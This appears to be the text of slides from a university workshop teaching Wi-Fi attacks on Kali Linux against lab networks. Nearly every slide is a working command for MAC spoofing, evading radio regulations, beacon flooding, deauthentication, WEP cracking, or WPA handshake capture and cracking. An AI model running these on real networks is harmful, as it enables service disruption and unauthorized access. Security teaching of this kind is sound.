ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge
Disclaimer By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored. Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits. The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.
Information All steps in this slide show were performed and tested on 32-bit kali linux version with an Alfa AWUSO36H USB wireless card(these are the operating system and wireless card you have in front of you). Any statement that beings with ‘#’ is a command to be typed in the terminal
What is Kali Linux Debian based Linux operating system Designed for the sole purpose of penetration testing, exploitation, and hacking
Booting into Kali Linux Start with computer off Plug in flash drive and USB wireless card Boot the computer off of the USB flash drive From YUMI select system tools then kali Select live (686-pae) from the boot menu
Post Kali Boot Make sure that your computer is not in “airplane” mode –Click applications system tools preferences system settings network –Make sure airplane mode is off –Close that window
Temporarily Connecting to The Internet Click the network icon in the upper right –Looks like two computers with a red circle and a X Select the MST-PSK-N network Make sure you are connecting with the non-realtek wireless adapter Enter the password “JoeMiner”
Getting Necessary Files Open the terminal Type #wget es es Open root under the places menu Unzip the file and make sure the files are all in the root folder
Terms and Definitions Access Point(AP) Bandwidth Channel Evil Twin Frequency Honeypot IEEE
Terms and Definitions IP Address ISM Band MAC Address Modes of Wi-fi NIC Packet
Terms and Definitions Rainbow Table WEP Wi-Fi WPA WPA2 WPS
FINDING THE CORRECT WIRELESS CARD
Open the terminal
Type #airmon-ng
FINDING YOUR MAC ADDRESS
Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we want information on
#ifconfig wlan1
CHANGING YOUR MAC ADDRESS
Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface
#ifconfig wlan1 down
Type #macchanger –m de:ad:be:ef:c0:fe wlan1 macchanger –program we are using -m –manually set the MAC address de:ed:be:ef:c0:fe –MAC address of your choice wlan1 –interface we are changing the MAC of
#macchanger –m de:ad:be:ef:c0:fe wlan1
Type #ifconfig wlan1 up ifconfig –program that we are running wlan1 –interface we are operating on down –enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we are interested in
#ifconfig wlan1
RANDOMLY CHANGING YOUR MAC ADDRESS
Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface
#ifconfig wlan1 down
Type #macchanger –r wlan1 macchanger –program we are using -r –random MAC address wlan1 –interface we are operating on
#macchanger –r wlan1
Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in
#ifconfig wlan1
CHANGING YOUR MAC ADDRESS BACK TO IT’S FACTORY SETTING
Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface
#ifconfig wlan1 down
Type #macchanger –p wlan1 macchanger –the program we are using -p –changes the MAC back to factory settings wlan1 –the interface we are operating on
#macchanger –p wlan1
Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in
#ifconfig wlan1
CHANGING THE CHANNEL OF YOUR WIRELESS CARD
type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in
#iwconfig wlan1
type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…
#iwconfig wlan1 channel c
type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in
#iwconfig wlan1
OPERATING OUTSIDE OF US REGULATION FREQUENCIES
type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings
#iw reg get
type #iw reg set JP iw –program we are using reg –short for regulation set –allows us to set the country regulation JP –country code for japan allows us to operate on channels 12,13,&14
#iw reg set JP
type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings
#iw reg get
Type #iwconfig wlan1 channel 14 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to set the channel 14 –channel we are setting
#iwconfig wlan1 channel 14
Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in
#iwconfig wlan1
CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY
type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…
#iwconfig wlan1 channel c
OPERATING YOUR WIRELESS CARD WITH MORE POWER
Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on
#iwconfig wlan1
Type #iw reg set BO iw –program we are using reg –short for regulation set –allows us to set the country regulation BO –country code for Bolivia
#iw reg set BO
Type #iwconfig wlan1 txpower 30 iwconfig –program we are using wlan1 –interface we are operating on txpower –stands for transmit power 30 –power output in dBm
#iwconfig wlan1 txpower 30
Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on
#iwconfig wlan1
Note on Transmit Power The power output has increased from.1 Watt to 1 Watt With our current equipment(Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be
FINDING THE MODES YOUR WIRELESS CARDS SUPPORTS
Type #airmon-ng airmon-ng –program we are using
#airmon-ng
Type #iw phy phy0 info|grep –A3 modes iw –program we are using phy –search based upon physical device number phy0 –physical device number from airmon-ng info –give us the info about the phy0 device | grep –pipes the output into the program grep -A3 –indicates to output 3 lines are the given search term modes –the term we are searching for with grep
#iw phy phy0 info|grep –A3 modes
Modes Supported IBSS –ad-hoc mode –computer to computer connection managed –allows you to connect to networks –your Wi-Fi card is usually in managed mode monitor –promiscuous mode –allows you to view traffic not destined to your card
OPERATING YOUR CARD IN AD-HOC MODE
Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface
#ifconfig wlan1 down
Type #iwconfig wlan1 mode ad-hoc iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to set a specific mode ad-hoc –the mode we will be using
#iwconfig wlan1 mode ad-hoc
Type #iwconfig wlan1 channel 1 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to change the channel 1 –specific channel we are using 1,2,3…
#iwconfig wlan1 channel 1
Type #iwconfig wlan1 essid ‘nameofnetwork’ iwconfig –program we are using wlan1 –interface we are operating on essid –allows us to set the network name ‘nameofnetwork’ –name of the network
iwconfig wlan1 essid ‘nameofnetwork’
Type #iwconfig wlan1 key s:’password’ iwconfig –program we are using wlan1 –interface we are operating on key –allows us to operate a network with a WEP key –a WPA/WPA2 key is not possible(I think) s: –indicates the key entered is in ASCII ‘password’ –the key as an ASCII String
#iwconfig wlan1 key s:’password’
Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are operating on up –enable the interface
#ifconfig wlan1 up
Type #iwconfig wlan1 iwconfig –the program we are using wlan1 –the interface we are operating on
#iwconfig wlan1
TURNING OFF AD-HOC MODE
type #iwconfig wlan1 mode managed iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to change the mode of the adapter managed –sets managed mode
OPERATING YOUR CARD IN MONITOR MODE
type #airmon-ng start wlan1 airmong-ng –program we are using start –enables monitor mode wlan1 –interface we wish to enable monitor mode on
#airmon-ng start wlan1
type #kill 3018 & kill 3853 kill –command to stop programs from running 3018 –PID of process from slide before & –and, allows multiple commands in one line
#kill 3018 & kill 3853
type #iwconfig iwconfig –program we are using
#iwconfig
DATA GATHERING IN MONITOR MODE
type #tshark –i mon0 tshark –program we are using –terminal wireshark -i –interface mon0 –interface we are operating on
#tshark –i mon0
type ctrl-c crtl-c –stops the running program
type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we wish to view wireless traffic on
#airodump-ng mon0
BSSID –MAC address of access point station –MAC address of connected client Probe –shows what access points a station is looking for
type ctrl-c crtl-c –stops the running program
BEACON FLOODING
What are Beacons Management Frame in IEEE (Wi-Fi) Transmitted to announce the presence of a network Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.
type #nano ssidlist nano –text editor I am using –you may use something else if you prefer ssidlist –filename for the text file that will contain the SSIDS we will be broadcasting
#nano ssidlist
type different network names on separate lines
type ctrl-x, y, enter This saves the file in nano you could also write out the file and then exit this may be different if you didn’t use nano
type #mdk3 mon0 b –f ssidlist mdk3 –program we are using mon0 –interface we are operating on b –means to send out beacon frames ssidlist –text files with the network names in it
#mdk3 mon0 b –f ssidlist
type ctrl-c to stop stops the running program
VIEWING PROBE REQUESTS
What are Probe Requests Management Frame in IEEE (Wi-Fi) A packet sent from a client(computer, phone, etc) to see if a network is within range Your devices are constantly sending out Probe Requests and we can view them(also exploit them, but that’s later)
type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on
#airodump-ng mon0 In a very dense Wi-Fi environment, we will be unable to see the probe requests at first to fix this –zoom out available from the view menu –stop the program with ctrl-c –zoom in available from the view menu
#airodump-ng mon0
PASSIVE NETWORK SCAN
Type #iw dev wlan1 scan passive | grep SSID iw –program we are using dev –indicates that we are identifying our Wi-Fi card by device number and not physical number wlan1 –interface we wish to scan on passive –indicates that no packets should be sent | grep –program that is used to search the output SSID –the word that grep will be searching for
#iw dev wlan1 scan passive | grep SSID
ACTIVE NETWORK SCAN
Type #iwlist wlan1 scan | grep ESSID iwlist –program we are using wlan1 –interface we are scanning on scan –indicates we wish to scan |grep –program used to search the output of iwlist ESSID –the word we are searching for with grep
#iwlist wlan1 scan | grep ESSID
DEAUTHENTICATION
What is Deauthentication Management Frame in IEEE (Wi-Fi) Allows clients to be kicked off of a wireless access point These are naturally occurring in wireless traffic and users do not even recognize it We can send excessive amounts of these packets to prevent a client from connecting
DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on
#airodump-ng mon0
type ctrl-c when you have finished finding your target
Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to
#iwconfig mon0 channel 11
Type #aireplay-ng --ignore-negative- one –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:b2 –client MAC address mon0 –interface to send deauth packets out on
#aireplay-ng --ignore-negative-one –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0
DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using
#airodump-ng mon0
type ctrl-c when you have finished finding your target
Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to
#iwconfig mon0 channel 11
Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing
#nano blacklist
Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point Type ctrl-x, y, enter –this saves the file
Type #mdk3 mon0 d –b blacklist –c 11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We are wanting to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channel to use 11 –channel the access points are operating on
#mdk3 mon0 d –b blacklist –c 11
type ctrl-c to stop the program
DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using
#airodump-ng mon0
Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing
#nano blacklist
Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point Type ctrl-x, y, enter –this saves the file
Type #mdk3 mon0 d –b blacklist –c 6,11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We are wanting to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channel to use 6,11 –channels the access points are operating on
#mdk3 mon0 d –b blacklist –c 6,11
type ctrl-c to stop the program
CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on
#airodump-ng mon0
type ctrl-c when done finding the access point to wish for clients to connect to
Type #nano whitelist nano –text editor we are using –you may use something else if you prefer whitelist –text file with the list of MAC addresses of the access points you want clients to be able to connect to
#nano whitelist
note that it is possible to enter multiple MAC addresses in this file as well type ctrl-x, y, enter with finished
Type #mdk3 mon0 d –w whitelist mdk3 –program we are using mon0 –interface to send deauth packets from d –indicates to deauthenticate clients -w –indicates we are whitelisting specific access points whitelist –text file that contains the MAC address of the AP we want clients to connect to –deauths all APs other than those on this list
#mdk3 mon0 d –w whitelist
type ctrl-c when done sending deauth packets
BREAKING ENCRYPTION
BREAKING WEP ENCRYPTION
Breaking WEP Encryption
Steps –Identify Network –Begin collecting data –cause extra data to be generated optional will not want to be done if conducting a passive attack –start cracking once the number of Initialization Vectors(IVs) reaches 50,000
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on
#airodump-ng mon0
Notice that in the ENC column it says WEP. Any WEP encrypted access point is vulnerable. type ctrl-c when you have finished finding your target
#airodump-ng mon0
Breaking WEP Encryption open a new table in the terminal window file new tab
Type #aireplay-ng --ignore-negative- one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed –Associates with the Access Point -a 12:18:0a:21:ae:e4 –indicates MAC address of AP & MAC of the AP -h 00:c0:ca:75:6f:ab –sets source MAC address & MAC of our wireless card mon0 –interface we are operating on
Type #aireplay-ng --ignore-negative- one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
Type #aireplay-ng --ignore-negative- one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed -3 –ARP Request Replay Attack –most effective way to generate new IVs -b 12:18:0a:21:ae:e4 –indicates MAC address of AP & MAC of the AP -h 00:c0:ca:75:6f:ab –sets source MAC address & MAC of our wireless card mon0 –interface we are operating on
#aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
Breaking WEP Encryption Go back to the first tab and wait until the number in the data column >50000 This number is not set since the attack we are doing is based upon statistics. Sometimes you can break it with half as many and sometimes you need twice as many or more. The length of the key also contributes to the number of IVs that are needed
Breaking WEP Encryption
Open a new tab in the terminal
Type #aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap aircrack-ng –program we are using -b 12:18:0a:21:ae:e4 –the MAC address of the target Access Point acm_wep-01.cap –the file that contains the files captures with airodump-ng
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap
If you are not successful wait until the number captured increases to the suggested number and then try again
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep- 01.cap
If successful, you will see the image previous. Go back to the other two tabs and stop the running programs using ctrl-c
BREAKING WPA&WPA2 ENCRYPTION
Breaking WPA&WPA2 Encryption What makes WPA&WPA2 more difficult to break into? –larger key –does not use RC4 –Used Network as well as password to computer the key
Breaking WPA&WPA2 Encryption No short cut like in breaking WEP Must brute force the key Hope that it is a dictionary word or something very simple such as ten numbers Three networks set up for breaking into –dictionary password –8-char alpha-numeric –random
Breaking WPA&WPA2 Encryption Process –Begin listen to the packets on that network –Capture 4-way handshake between AP and client this can be done passively or by deauthentication –take that captured handshake and try different sources of passwords to break it –wait and see
BREAKING WPA WITH A DICTIONARY LIST
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on
#airodump-ng mon0
After finding the target network type ctrl-c to stop running the program
Type #airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0 airodump-ng –program we are using -c 11 –says to listen on channel 11 --bssid 00:1a:c4:51:3c:31 –listen for traffic to and from this Access point --w acm_dictionary –file to save the data to mon0 –interface we are listening on
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
The previous image shows connected clients to the specific access point At this point you could wait for the handshake to occur or you could force it to occur by means of deauth
Breaking WPA&WPA2 encryption Open a new tab in terminal This can be done by going to file new tab
Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are operating on channel –allows us to change the channel 11 –specific channel we are changing the interface to
#iwconfig mon0 channel 11
Type #aireplay-ng --ignore-negative- one –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:b2 –client MAC address mon0 –interface to send deauth packets out on
#aireplay-ng --ignore-negative-one –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
Type #aireplay-ng --ignore-negative- one –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
Breaking WPA&WPA2 encryption Go back to the first tab and you should see an image similar to the following The WPA handshake in the top must be there to proceed
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
Breaking WPA&WPA2 encryption Make sure the dictionary files that you downloaded earlier are in the same folder as your.cap files. This should be in the root directory We will be demonstrating using the english.txt file, however feel free to experiment with the others
Type #aircrack-ng acm_dictionary-01.cap –w english.txt aircrack-ng –program we are using to crack the key acm_dictionary-01.cap –network capture file with the handshake in it -w –indicates that a word list is to be used english.txt –the file name containing the wordlist
#aircrack-ng acm_dictionary- 01.cap –w english.txt
If not successful that means that the password was not in that list of words You could try using a larger word list or begin brute forcing to break the password If successful you should see the following
#aircrack-ng acm_dictionary- 01.cap –w english.txt
BREAKING WPA&WPA2 USING A RAINBOW TABLE
What is a Rainbow Table pre-computed table of hashed value they are built for a specific SSID(network name) built using a dictionary or some other source of passwords Takes a long time to compute and is a very large file –Usually done on a very powerful computer The rainbow can then be used to quickly find a password
Breaking WPA&WPA2 using a Rainbow Table Because we already have the handshake, we do not need to re- capture it. We will be using the same.cap file as the previous example
Breaking WPA&WPA2 encryption Make sure the rainbow table that you downloaded earlier is in the same folder as your.cap files. This should be in the root directory We will be demonstrating using the acm_dictionary_hash file This file was created from the english.txt dictionary file specifically for this SSID
Type #cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –s acm_dictionary cowpatty –program we are using -r acm_dictionary-01.cap –the file that has the four way handshake in it -d acm_dictionary_hash –the file that is the pre-computed hashed for this specific SSID -s acm_dictionary –telling cowpatty what the name of the network is
#cowpatty –r acm_dictionary- 01.cap –d acm_dictionary_hash – s acm_dictionary
If the password was not in the source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password If successful, you will see the following image
#cowpatty –r acm_dictionary- 01.cap –d acm_dictionary_hash – s acm_dictionary
COMPUTING A PERSONALIZED RAINBOW TABLE
Computing a personalized rainbow table As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc This is also used when you know the network name in advance and wish to prepare for the attack on the network
Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on
#airodump-ng mon0
After finding the target network type ctrl-c to stop running the program
Type #genpmk –f english.txt –d acm_dictionary_hash –s acm_dictionary genpmk –the program we are using -f english.txt –the file serving as the source of passwords -d acm_dictionary_hash –what the rainbow table should be saved as -s acm_dictionary –telling genpmk what the SSID is so that it can be hashed appropriately
#genpmk –f english.txt –d acm_dictionary_hash –s acm_dictionary
BRUTE FORCING A PASSWORD
Brute forcing a password This is the most time consuming method although is guaranteed to eventually find the password
Brute forcing a password As you already have the four way hand shake, we will be moving right into the cracking portion of this example
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap john –program we using. short for john the ripper -stdout –directs standard out to aircrack-ng -incremental:all –will increment through all possible passwords | aircrack-ng –second program we are running with the input being supplied by john the ripper -b 00:1a:c4:51:3c:31 –tells aircrack-ng which access point to attack -w – –this is where the standard output of john the ripper is going acm_dictionary-01.cap –the file containing the four way handshake to be brute forced
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap
Brute forcing a password The previous slide shows John the Ripper and aircrack-ng being used together There are ways to cut down on the number of possible passwords, for example –if you know the password is 14 characters, you can have john skip passwords less than and greater than 14 characters. This is the longest way to crack a password but also a guaranteed way to do it